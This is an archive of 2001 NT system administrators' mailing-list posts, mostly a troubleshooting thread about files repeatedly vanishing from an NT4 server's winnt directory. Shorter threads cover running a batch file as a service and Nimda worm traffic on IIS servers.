RE: Files keep disappearing from the winnt dir

[John Cesta - Lists]

Title: Message



That's 
a good one but there aren't any dlls in our winnt directory.

  -Original Message-From: klimo 
  [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 3:52 
  AMTo: NT System Admin IssuesSubject: Re: Files keep 
  disappearing from the winnt dir
  I have been told ( it could be a rumor ), that there is a 
  virus, which is "hungry" for .dll's!
  Maybe this is true!
  
- Original Message - 
From: 
Mark Pilbeam 
To: NT System Admin 
Issues 
Sent: Friday, September 28, 2001 9:22 
AM
Subject: RE: Files keep disappearing 
from the winnt dir

Hi,
Intrigued, 
and I thought it was just me.
Recently I spoke to an admin who was telling 
me the same thing.
He lost all his printers, and 
then some of his.dll's went missing 
too.
No idea what is going on, but 
his PDC is grinding away like a concrete making 
machine.
Is it possible that the mft is 
corrupted, possibly caused by wear andtear, (the server hasn't been 
reimaged or re-installed for over 5 
years.)
From: John Cesta - Lists 
[mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 
11:49 PMTo: NT System Admin IssuesSubject: RE: Files 
keep disappearing from the winnt dir

  
  I have been running this system for about5 years, been in the 
  business for about 17 years. What I am saying is that the files are gone. 
  Vanished. Not there. Thyey are missing. If I try to run explorer from the 
  start menu, nothing happens. So, I go to start  run  and run the 
  explorer.exe which I have stored away in a seperate directory in case it 
  vanishes from the winnt dir.
  
  I am just asking if anyone has had the occasion of, maybe a corrupt 
  system, and has experienced this before? I don't think any other files are 
  missing, could be but I know the ones in the winnt are missing. I can copy 
  them in there, see them, run them, and 30 minutes later they are not 
  there. Take my statement literally...the files are gone, caput, vanished, 
  not visible and all other meanings of "not there" etc. 
  :)))
  
  
  John
  
-Original Message-From: Chris Shattock 
[mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 
2001 6:29 PMTo: NT System Admin IssuesSubject: Re: 
Files keep disappearing from the winnt dir
I have to ask too: When you say the files 
are missing - and yet you can run explorer from CMD - are you saying you 
can't see them in Explorer or can't you see them from cmd prompt. Or - 
even better - if you boot from floppyto cmd prompt are they there 
then? Is it FAT or NTFS partition? Are other files 'missing' in other 
directories?

  - Original Message - 
      From: 
  John Cesta 
  - Lists 
  To: NT System Admin 
  Issues 
  Sent: Thursday, September 27, 
  2001 11:58 PM
  Subject: RE: Files keep 
  disappearing from the winnt dir
  
  
  I am the admin. I can login ok, but I can't run the explorer. I 
  have to do a start  run  explorer. I've placed it in a 
  different area. Remember, only the "files" are missing in the winnt 
  dir. There is not much in there that you need to 
  login.
  
  John
  
-Original Message-From: Flanagan, Kevin 
[mailto:[EMAIL PROTECTED]]Sent: Thursday, September 
27, 2001 3:57 PMTo: NT System Admin 
IssuesSubject: RE: Files keep disappearing from the winnt 
dir
I have to ask, how is it that you are able to log in if all 
of the files in the winnt directory are gone? Are you sure 
that you can't see them but they are there?





+---+ 
Kevin 
Flanagan C/S Planning Engineer III I/T Implementation 
Department Branch Banking  Trust Company 3261 Atlantic Avenue, Suite 
116 MC: 
172-85-01-00 Raleigh, NC 27604 Voice: 919-716-6209 


  
  -Original 
      Message-From: John Cesta - Lists 
  [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 
  2001 1:10 PMTo: NT System Admin 
  IssuesSubject: RE: Files keep disappearing from the 
  winnt dir
  
  No, 
  actually, I haven't. that server is not involved inany email 
  clientsor not usedby anyone. It is a backup server 
  tied to one other server. That's 
  it.
   

RE: Files keep disappearing from the winnt dir

[John Cesta - Lists]

Title: Message




That's 
kind of what Iwas thinking. THe files system is corrupt. The server is 
still working fine 

  -Original Message-From: Mark Pilbeam 
  [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 
  2:22 AMTo: NT System Admin IssuesSubject: RE: Files keep 
  disappearing from the winnt dir
  Hi,
  Intrigued, and 
  I thought it was just me.
  Recently I spoke to an admin who was telling me 
  the same thing.
  He lost all his printers, and 
  then some of his.dll's went missing 
  too.
  No idea what is going on, but his 
  PDC is grinding away like a concrete making 
  machine.
  Is it possible that the mft is 
  corrupted, possibly caused by wear andtear, (the server hasn't been 
  reimaged or re-installed for over 5 years.)
  From: 
  John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Thursday, 
  September 27, 2001 11:49 PMTo: NT System Admin 
  IssuesSubject: RE: Files keep disappearing from the winnt 
  dir
  

I 
have been running this system for about5 years, been in the business 
for about 17 years. What I am saying is that the files are gone. Vanished. 
Not there. Thyey are missing. If I try to run explorer from the start menu, 
nothing happens. So, I go to start  run  and run the explorer.exe 
which I have stored away in a seperate directory in case it vanishes from 
the winnt dir.

I 
am just asking if anyone has had the occasion of, maybe a corrupt system, 
and has experienced this before? I don't think any other files are missing, 
could be but I know the ones in the winnt are missing. I can copy them in 
there, see them, run them, and 30 minutes later they are not there. Take my 
statement literally...the files are gone, caput, vanished, not visible and 
all other meanings of "not there" etc. :)))


John

  -Original Message-From: Chris Shattock 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 
  6:29 PMTo: NT System Admin IssuesSubject: Re: Files 
  keep disappearing from the winnt dir
  I have to ask too: When you say the files are 
  missing - and yet you can run explorer from CMD - are you saying you can't 
  see them in Explorer or can't you see them from cmd prompt. Or - even 
  better - if you boot from floppyto cmd prompt are they there then? 
  Is it FAT or NTFS partition? Are other files 'missing' in other 
  directories?
  
- Original Message - 
From: 
    John Cesta - 
    Lists 
To: NT System Admin 
Issues 
Sent: Thursday, September 27, 2001 
11:58 PM
Subject: RE: Files keep 
disappearing from the winnt dir


I am the admin. I can login ok, but I can't run the explorer. I 
have to do a start  run  explorer. I've placed it in a different 
area. Remember, only the "files" are missing in the winnt dir. There is 
not much in there that you need to login.

John

  -Original Message-From: Flanagan, Kevin 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 
  2001 3:57 PMTo: NT System Admin IssuesSubject: 
  RE: Files keep disappearing from the winnt dir
  I have to ask, how is it that you are able to log in if all of 
  the files in the winnt directory are gone? Are you sure that you 
  can't see them but they are there?
  
  
  
  
  
  +---+ 
  Kevin 
  Flanagan C/S Planning Engineer III I/T Implementation 
  Department Branch Banking  Trust Company 3261 Atlantic Avenue, Suite 
  116 MC: 
  172-85-01-00 Raleigh, NC 27604 Voice: 919-716-6209 
  
  

-Original Message-From: John 
    Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, 
September 28, 2001 1:10 PMTo: NT System Admin 
IssuesSubject: RE: Files keep disappearing from the winnt 
dir

No, 
actually, I haven't. that server is not involved inany email 
clientsor not usedby anyone. It is a backup server tied 
to one other server. That's 
it.

John


  -Original Message-From: 
  Martin Blackstone 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, 
  September 27, 2001 12:00 PMTo: NT System Admin 
  IssuesSubject: RE: Files keep disappearing from the 
  winnt dir
  Just for the halibut, have you run a 
  full AV scan on this server?
  
  

-Original 
    Message-----From

RE: Files keep disappearing from the winnt dir

[John Cesta - Lists]

Title: Message





  -Original Message-From: Miley, Dan 
  [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 9:01 
  AMTo: NT System Admin IssuesSubject: RE: Files keep 
  disappearing from the winnt dir
  You 
  say I KNOW that the server does not have any 
  viruses
  
  have you booted to known good media and done a virus scan?
  
  Yes, that's why I made that statement. 
  :)
  
  
  John
  


  

  

  

-Original 
Message-From: John Cesta - Lists 
[mailto:[EMAIL PROTECTED]] Subject: RE: Files keep 
disappearing from the winnt dir

No, 
actually, I haven't. that server is not involved inany 
email clientsor not usedby anyone. It is a backup 
server tied to one other server. That's 
it.

John


  -Original Message-From: 
  Martin Blackstone 
  [mailto:[EMAIL PROTECTED]]Subject: RE: 
  Files keep disappearing from the winnt 
dir
  Just for the halibut, have you run 
  a full AV scan on this server?
  
  

-Original 
Message-From: John Cesta - Lists 
[mailto:[EMAIL PROTECTED]] Sent: Friday, 
September 28, 2001 8:07 AMTo: NT System Admin 
IssuesSubject: Files keep disappearing from the 
winnt dir

I am having a sort of weird problem on 
one of my NT4.0 SP6a servers. A while back I had to clean 
the server - chkdsk - seemed to work ok.

After that this problem keeps 
occurring. One day I noticed that the files - notany 
directories just files - in the c:\winnt directory 
were gone except for two of them. I copied the files from 
another identical NT box in to this server's winnt 
directory. A day or so later they were gone again. I copied 
them into the dir again, a day later they are gone. I KNOW 
that the server does not have any viruses. I can only figure 
that the server may have a corrupt file system and needs to 
be cleaned once more. 

Any suggestions?

John Cesta

Want 
  to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a 
  good FAQ? Try this one first:http://www.ultratech-llc.com/KB/
  This e-mail may be privileged and/or confidential, 
  and the sender does not waive any related rights and obligations. Any 
  distribution, use or copying of this e-mail or the information it contains by 
  other than an intended recipient is unauthorized. If you received this e-mail 
  in error, please advise me (by return e-mail or otherwise) immediately. 
  
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Files keep disappearing from the winnt dir

[John Cesta - Lists]

Our server is not running the dir replicator.

Imagine this...

You load explorer, navigate to the c:\winnt directory and list it. You see
all the directories and the files. Mostly the files are some ini and txt
files along with some exes that you may or may not use. Anyway, you see them
all in there. You close explorer and go get a cup of coffee. You return,
load explorer, navigate to the c:\winnt dir again the files are gone except
for two exes. IN our case it is the named.exe and another I forgot.

Keep in mind, now, you are the only one who can access this computer since
it is locked in a cage in a very protected datacenter, trust me, you are the
only one that has access. This is what is happening.  There is no dir
replication service running or any other funky software or scheduled
maintenance or appsnothing.

The only thing I can think of is that the file system is corrupt and the
files just get eaten up.

I then copy them back into the winnt dir ( I have them stored on another
part of the hard disk since they keep vanishing) and it happens again.

John

 -Original Message-
 From: Wong, Joe [mailto:[EMAIL PROTECTED]]
 Sent: Friday, September 28, 2001 12:31 PM
 To: NT System Admin Issues
 Subject: RE: Files keep disappearing from the winnt dir


 Is the server running the Directory Replicator service?

 ... Joe

  -Original Message-
 From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
 Sent: Friday, September 28, 2001 11:12 AM
 To: NT System Admin Issues
 Subject: RE: Files keep disappearing from the winnt dir




 AT service isn't running. No hands ever touch that server, it's
 in a locked
 cabinet only accessible by me, my access code, palm print and badge..

 John

 -Original Message-
 From: Brian Steele [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, September 27, 2001 12:44 PM
 To: NT System Admin Issues
 Subject: Re: Files keep disappearing from the winnt dir


 WAG: Is the Task Scheduler running?  Check to see if anyone's set anything
 nasty to run.

 Brian


 - Original Message -
 From: John Cesta -  mailto:[EMAIL PROTECTED] Lists
 To: NT System Admin
 mailto:[EMAIL PROTECTED] Issues
 Sent: Friday, September 28, 2001 11:07 AM
 Subject: Files keep disappearing from the winnt dir



 I am having a sort of weird problem on one of my NT4.0 SP6a
 servers. A while
 back I had to clean the server - chkdsk - seemed to work ok.

 After that this problem keeps occurring. One day I noticed that
 the files -
 not any directories just files -  in the c:\winnt directory were
 gone except
 for two of them. I copied the files from another identical NT box
 in to this
 server's winnt directory. A day or so later they were gone again. I copied
 them into the dir again, a day later they are gone. I KNOW that the server
 does not have any viruses. I can only figure that the server may have a
 corrupt file system and needs to be cleaned once more.

 Any suggestions?

 John Cesta

 Want to unsub? Do that here:
 http://www.w2knews.com/rd/rd.cfm?id=unsub
 Need a good FAQ? Try this one first:
 http://www.ultratech-llc.com/KB/


 Want to unsub? Do that here:
 http://www.w2knews.com/rd/rd.cfm?id=unsub
 Need a good FAQ? Try this one first:
 http://www.ultratech-llc.com/KB/




  

 This email communication is intended as a private communication
 for the sole
 use of the primary addressee and those individuals listed for
 copies in the
 original message. The information contained in this email is private and
 confidential and if you are not an intended recipient you are hereby
 notified that copying, forwarding or other dissemination or
 distribution of
 this communication by any means is prohibited.  If you are not
 specifically
 authorized to receive this email and if you believe that you
 received it in
 error please notify the original sender immediately.  We honour similar
 requests relating to the privacy of email communications.

 Cette communication par courrier électronique est une
 communication privée à
 l'usage exclusif du destinataire principal ainsi que des
 personnes dont les
 noms figurent en copie.  Les renseignements contenus dans ce courriel sont
 confidentiels et si vous n'êtes pas le destinataire prévu, vous
 êtes avisé,
 par les présentes que toute reproduction, tout transfert ou toute autre
 forme de diffusion de cette communication par quelque moyen que
 ce soit est
 interdit.  Si vous n'êtes pas spécifiquement autorisé à recevoir
 ce courriel
 ou si vous croyez l'avoir reçu par erreur, veuillez en aviser l'expéditeur
 original immédiatement.  Nous respectons les demandes similaires qui
 touchent la confidentialité des communications par courrier électronique.

 Want to unsub? Do that here:
 http://www.w2knews.com/rd/rd.cfm?id=unsub
 Need a good FAQ? Try this one first:
 http://www.ultratech-llc.com/KB/




Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http

RE: Batch file to NT Service

[John Cesta - Lists]

We use 
FireDaemon at formida.comto create service. Don't know about a batch file 
though. 

John 
Cesta


ColdFusion ASP ActiveState PERL HostingIncludes 10 Domains - 
100% Browser Based Administrationhttp://www.cybersmarts.netLogFileManager 
- IIS LogFile Management ToolWebPageChecker - Helps Maintain Server 
UpTimehttp://www.serverautomationtools.com 


  -Original Message-From: Jolley Lee @Consult 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 
  2001 10:31 AMTo: NT System Admin IssuesSubject: Batch 
  file to NT Service
  Does anybody know how I can take a batch file and make 
  it a service. I've heard it is possible to make an executable into a service 
  with some registry chnges but I don't know anymore than that. Any help would 
  be appreciated.
  
  TIA
  
  Lee
  
  **This 
  email transmission is confidential and intended for theaddressee only. It 
  may contain privileged and confidentialinformation. If you are not the 
  person or organisation towhom it is addressed, you must not copy, 
  distribute, or takeany action in reliance upon it. If you have received 
  thismessage in error, please notify the[EMAIL PROTECTED] and 
  return it.Carillion PLC Registered in England No. 
  3782379Registered Office:Birch Street Wolverhampton WV1 
  4HY**Want 
  to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a 
  good FAQ? Try this one 
  first:http://www.ultratech-llc.com/KB/_This 
  message has been checked for all known viruses by Star Internetdelivered 
  through the MessageLabs Virus Scanning Service. For furtherinformation 
  visit http://www.star.net.uk/stats.asp or alternatively callStar Internet 
  for details on the Virus Scanning Service.Want to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Files keep disappearing from the winnt dir

[John Cesta - Lists]

Title: Out of Buffer Error




I am 
having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I 
had to clean the server - chkdsk - seemed to work ok.

After 
that this problem keeps occurring. One day I noticed that the files - 
notany directories just files - in the c:\winnt directory were gone 
except for two of them. I copied the files from another identical NT box in to 
this server's winnt directory. A day or so later they were gone again. I copied 
them into the dir again, a day later they are gone. I KNOW that the server does 
not have any viruses. I can only figure that the server may have a corrupt file 
system and needs to be cleaned once more. 

Any 
suggestions?

John 
Cesta


ColdFusion ASP ActiveState PERL HostingIncludes 10 Domains - 
100% Browser Based Administrationhttp://www.cybersmarts.netLogFileManager 
- IIS LogFile Management ToolWebPageChecker - Helps Maintain Server 
UpTimehttp://www.serverautomationtools.com 


  -Original Message-From: Jason Dwyer 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 
  2001 12:18 AMTo: NT System Admin IssuesSubject: Out of 
  Buffer Error
  Hi there guys, 
   I am new to the list 
  and have been lurking the last few days, I must say there is a lot of 
  knowledge that flows through here, I would like to try and tap some.
  I am running an NT4 server with SP6a, using a product called 
  Wingate('cos I don't know how to use Proxy) as a web sharing proxy box. 
  Occasionally I get this Out of Buffers errror. I have searched the 
  wingate kb and MS but am struggling to find a solution. Any ideas?
  Regards,
  Jason Dwyer
  Want to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Files keep disappearing from the winnt dir

[John Cesta - Lists]

Title: Out of Buffer Error




AT 
service isn't running. No hands ever touch that server, it's in a locked cabinet 
only accessible by me, my access code, palm print and 
badge..

John

  -Original Message-From: Brian Steele 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 
  12:44 PMTo: NT System Admin IssuesSubject: Re: Files 
  keep disappearing from the winnt dir
  WAG: Is the Task Scheduler running? Check to see if 
  anyone's set anything nasty to run.
  
  Brian
  
  
- Original Message - 
From: 
John Cesta - 
Lists 
To: NT System Admin 
Issues 
Sent: Friday, September 28, 2001 11:07 
AM
Subject: Files keep disappearing from 
the winnt dir


I 
am having a sort of weird problem on one of my NT4.0 SP6a servers. A while 
back I had to clean the server - chkdsk - seemed to work 
ok.

After that this problem keeps occurring. One day I noticed that the 
files - notany directories just files - in the c:\winnt 
directory were gone except for two of them. I copied the files from another 
identical NT box in to this server's winnt directory. A day or so later they 
were gone again. I copied them into the dir again, a day later they are 
gone. I KNOW that the server does not have any viruses. I can only figure 
that the server may have a corrupt file system and needs to be cleaned once 
more. 

Any suggestions?

John CestaWant to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Files keep disappearing from the winnt dir

[John Cesta - Lists]

Title: Out of Buffer Error





I just 
ran an AV on the server. No virus.

John

  -Original Message-From: John Cesta - Lists 
  [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 1:12 
  PMTo: NT System Admin IssuesSubject: RE: Files keep 
  disappearing from the winnt dir
  
  AT 
  service isn't running. No hands ever touch that server, it's in a locked 
  cabinet only accessible by me, my access code, palm print and 
  badge..
  
  John
  
-Original Message-From: Brian Steele 
[mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 
12:44 PMTo: NT System Admin IssuesSubject: Re: Files 
keep disappearing from the winnt dir
WAG: Is the Task Scheduler running? Check to see if 
anyone's set anything nasty to run.

Brian


  - Original Message - 
  From: 
  John Cesta - 
  Lists 
  To: NT System Admin 
  Issues 
  Sent: Friday, September 28, 2001 
  11:07 AM
  Subject: Files keep disappearing from 
  the winnt dir
  
  
  I am having a sort of weird problem on one of my NT4.0 SP6a 
  servers. A while back I had to clean the server - chkdsk - seemed to work 
  ok.
  
  After that this problem keeps occurring. One day I noticed that the 
  files - notany directories just files - in the c:\winnt 
  directory were gone except for two of them. I copied the files from 
  another identical NT box in to this server's winnt directory. A day or so 
  later they were gone again. I copied them into the dir again, a day later 
  they are gone. I KNOW that the server does not have any viruses. I can 
  only figure that the server may have a corrupt file system and needs to be 
  cleaned once more. 
  
  Any suggestions?
  
  John CestaWant to unsub? Do that 
here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
this one first:http://www.ultratech-llc.com/KB/Want to 
  unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a 
  good FAQ? Try this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Files keep disappearing from the winnt dir

[John Cesta - Lists]

Title: Message




No, actually, I haven't. that server is 
not involved inany email clientsor not usedby anyone. It is a 
backup server tied to one other server. That's 
it.

John


  -Original Message-From: Martin Blackstone 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 
  27, 2001 12:00 PMTo: NT System Admin IssuesSubject: RE: 
  Files keep disappearing from the winnt dir
  Just for the halibut, have you run a full AV scan on this server?
  
  

-Original Message-From: John Cesta - 
Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 
8:07 AMTo: NT System Admin IssuesSubject: Files keep 
disappearing from the winnt dir

I 
am having a sort of weird problem on one of my NT4.0 SP6a servers. A while 
back I had to clean the server - chkdsk - seemed to work 
ok.

After that this problem keeps occurring. One day I noticed that the 
files - notany directories just files - in the c:\winnt 
directory were gone except for two of them. I copied the files from another 
identical NT box in to this server's winnt directory. A day or so later they 
were gone again. I copied them into the dir again, a day later they are 
gone. I KNOW that the server does not have any viruses. I can only figure 
that the server may have a corrupt file system and needs to be cleaned once 
more. 

Any suggestions?

John Cesta


ColdFusion ASP ActiveState PERL HostingIncludes 10 
Domains - 100% Browser Based Administrationhttp://www.cybersmarts.netLogFileManager 
- IIS LogFile Management ToolWebPageChecker - Helps Maintain Server 
UpTimehttp://www.serverautomationtools.com 


  -Original Message-From: Jason Dwyer 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 
  2001 12:18 AMTo: NT System Admin IssuesSubject: Out 
  of Buffer Error
  Hi there guys, 
   I am new to the 
  list and have been lurking the last few days, I must say there is a lot of 
  knowledge that flows through here, I would like to try and tap some.
  I am running an NT4 server with SP6a, using a product called 
  Wingate('cos I don't know how to use Proxy) as a web sharing proxy 
  box. Occasionally I get this Out of Buffers errror. I have 
  searched the wingate kb and MS but am struggling to find a solution. 
  Any ideas?
  Regards,
  Jason Dwyer
  Want to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one first:http://www.ultratech-llc.com/KB/Want to 
unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a 
good FAQ? Try this one 
  first:http://www.ultratech-llc.com/KB/Want to unsub? Do 
  that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? 
  Try this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Files keep disappearing from the winnt dir

[John Cesta - Lists]

Title: Out of Buffer Error



Nothing in the event logs. I thinik I will turn on auditing. Today the 
files were gone in a matter or 1 hour after I copied them in the 
directory.

John

  -Original Message-From: Ian Kelly 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 2:59 
  PMTo: NT System Admin IssuesSubject: RE: Files keep 
  disappearing from the winnt dir
  
  Anything in the 
  event logs? Is auditing turned on?
  
  
  Ian-[EMAIL PROTECTED]-To 
  assume makes an ass out of YOU. Leave ME out of this. 
  
  -Original 
  Message-From: John Cesta 
  - Lists [mailto:[EMAIL PROTECTED]] Sent: September 28, 2001 13:40 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from 
  the winnt dir
  
  
  
  
  
  
  I just 
  ran an AV on the server. No virus.
  
  
  
  John
  
-Original 
Message-From: John 
Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 1:12 
PMTo: NT System Admin 
IssuesSubject: RE: Files 
keep disappearing from the winnt dir



AT 
service isn't running. No hands ever touch that server, it's in a locked 
cabinet only accessible by me, my access code, palm print and 
badge..



John

  -Original 
  Message-From: Brian 
  Steele [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 
  12:44 PMTo: NT System 
  Admin IssuesSubject: Re: 
  Files keep disappearing from the winnt dir
  
  WAG: Is the Task Scheduler 
  running? Check to see if anyone's set anything nasty to 
  run.
  
  
  
  Brian
  
  
  

- Original 
Message - 

From: John Cesta - 
Lists 

To: NT System Admin 
Issues 

Sent: 
Friday, September 28, 2001 11:07 AM

Subject: 
Files keep disappearing from the winnt 
dir





I 
am having a sort of weird problem on one of my NT4.0 SP6a servers. A 
while back I had to clean the server - chkdsk - seemed to work 
ok.



After that this 
problem keeps occurring. One day I noticed that the files - notany 
directories just files - in the c:\winnt directory were gone 
except for two of them. I copied the files from another identical NT box 
in to this server's winnt directory. A day or so later they were gone 
again. I copied them into the dir again, a day later they are gone. I 
KNOW that the server does not have any viruses. I can only figure that 
the server may have a corrupt file system and needs to be cleaned once 
more. 



Any 
suggestions?



John 
Cesta
  Want to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one 
  first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that 
here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
this one 
first:http://www.ultratech-llc.com/KB/
  Want to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one 
  first:http://www.ultratech-llc.com/KB/Want 
  to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a 
  good FAQ? Try this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Nimbda is back???

[John Cesta - Lists]

I am sure Nimda will be around for a long, long time.

John

 -Original Message-
 From: Marco Martinez [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, September 27, 2001 8:54 PM
 To: NT System Admin Issues
 Subject: Nimbda is back???
 
 
 Folks, Nimbda is coming back!
 
 http://www.infoworld.com/articles/hn/xml/01/09/27/010927hnnimbda.x
 ml?0927ale
 rt
 -
 Marco A. Martinez
 Computing Services Coordinator (ITCC) / Microsoft Certified Professional
 College of Education, California State University, Sacramento.
 Phone: 916/278.5513  Fax: 916/278.5904
 Opinions expressed herein, are solely those of Marco Martinez, and not
 those of California State University, Sacramento.
 -
 
 
 Want to unsub? Do that here:
 http://www.w2knews.com/rd/rd.cfm?id=unsub
 Need a good FAQ? Try this one first:
 http://www.ultratech-llc.com/KB/
 
 

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

OT on Windows ME

[John Cesta - Lists]

I have been a member of this list for about a month. We are a small company
and I don't have the benefit of a large IT dept so I thought I'd throw this
question to you guys. My personal PC is a Windows ME PC. Today it started
doing something really weird. About every two hours it just kind of stops. I
mean, it still works and all ( although there is no more Internet access)
but it is very, very slow. Can't hardly move the mouse and I have to
shutdown too get it back. It's weird because it goes south almost like clock
work every 1.5 to 2 hours. I don't have a virus, I am fairly certain of
that. It actually happens all of a sudden, yea, I sat here and waited for it
to happen. It doesn't seem to be a gradual thing, I mean, it doesn't get
progressively slow, it happens all at once all of a sudden. It is a royal
PITA.

Any ideas? :

Thanks,

John Cesta


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: IIS Slow Down Due to Nimda?

[John Cesta - Lists]

Title: IIS Slow Down Due to Nimda?




Any one seen there IIS Server slow down due to the bug? 
Is there anyway to stop the request(cmd.exe) from even being 
made to you box? 
Here's is what my logs look like. Sunday was a little slow but 
on an average day we get around ~700 unique visitors. 

Of 
course IIS is going to slow down due to many requests. Not much of a way to make 
it stop unless you know where the source is, call them and ask. Otherwise we are 
all in the same boat.

John 
Cesta

  -Original Message-From: Jerry Gamblin 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 20, 
  2001 10:36 AMTo: NT System Admin IssuesSubject: IIS Slow 
  Down Due to Nimda?
  Any one seen there IIS Server slow down due to the bug? 
  Is there anyway to stop the request(cmd.exe) from even being 
  made to you box? 
  Here's is what my logs look like. Sunday was a little slow but 
  on an average day we get around ~700 unique visitors. 
  Date 
  Hits Successful Hits 09/16/2001 : 
  372 : 222 09/17/2001 : 3,454 : 1,026 
  09/18/2001 : 6,224 : 1,046 09/19/2001 : 5,401 : 745 09/20/2001 : 2,193 : 
  86 
  Total Hits : 17644 Average Hits : 
  3528 
  That's around 14,000 hits alone from this virus. 
  I don't know what its doing to the server, but is there any 
  way to make it stop? 
  Jerry Gamblin Technology 
  Specialist 
  Linn State Technical College One 
  Technology Drive Linn, MO 65051 [EMAIL PROTECTED] www.linnstate.edu 573-897-5240 
  -Original Message- From: 
  Murray Freeman [mailto:[EMAIL PROTECTED]] 
  Sent: Thursday, September 20, 2001 9:24 AM To: NT System Admin Issues Subject: RE: HELP 
  VIRUS ON NT MACHINE? 
  HEY, not true, not true. We got hit on 3 servers and were able 
  to cleanse manually and never even turned off the 
  servers, nor did it impact our regular 
  production. 
  Murray 
  -Original Message- From: Rocky 
  Stefano [mailto:[EMAIL PROTECTED]] 
  Sent: Thursday, September 20, 2001 9:21 AM To: NT System Admin Issues Subject: RE: HELP 
  VIRUS ON NT MACHINE? 
  For those of you that were unfortunately hit with the latest 
  worm. There is usually no recourse but to wipe the 
  machine clean and reload your software. Trend 
  Antivirus has released a cleaner for the virus. Here is the info. 
  Trend Micro has developed a cleaning tool that will allow you 
  to clean systems infected by PE_NIMDA.A. The cleaning 
  tool and instructions, manual cleaning instructions, 
  and the latest pattern file can be found on our FTP site at: 
  ftp://us-web\[EMAIL PROTECTED] 
  
  Password: tmcustomer 
  Directory: Premium Customer\tool 
  Files: 
  Cleaning tool: FIX_NIMDA.zip 
  Cleaning tool description and instructions: 
  Readme_nimda.txt 
  Manual cleaning documentation: How to Clean.txt 
  Latest pattern file: ptn_942.zip 
  -Original Message- From: 
  Tiffany Belcher [mailto:[EMAIL PROTECTED]] 
  Sent: September 19, 2001 5:35 PM To: 
  NT System Admin Issues Subject: HELP VIRUS ON NT 
  MACHINE? 
  This thing is on a machine at work and it writes .eml files 
  all over the place in the folders on the hard drive. 
  Is there a way to get rid if this virus? What is it? 
  Uninstalling outlook express or email would that do it? It ran very sluggish and now is frozen up. HELP 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
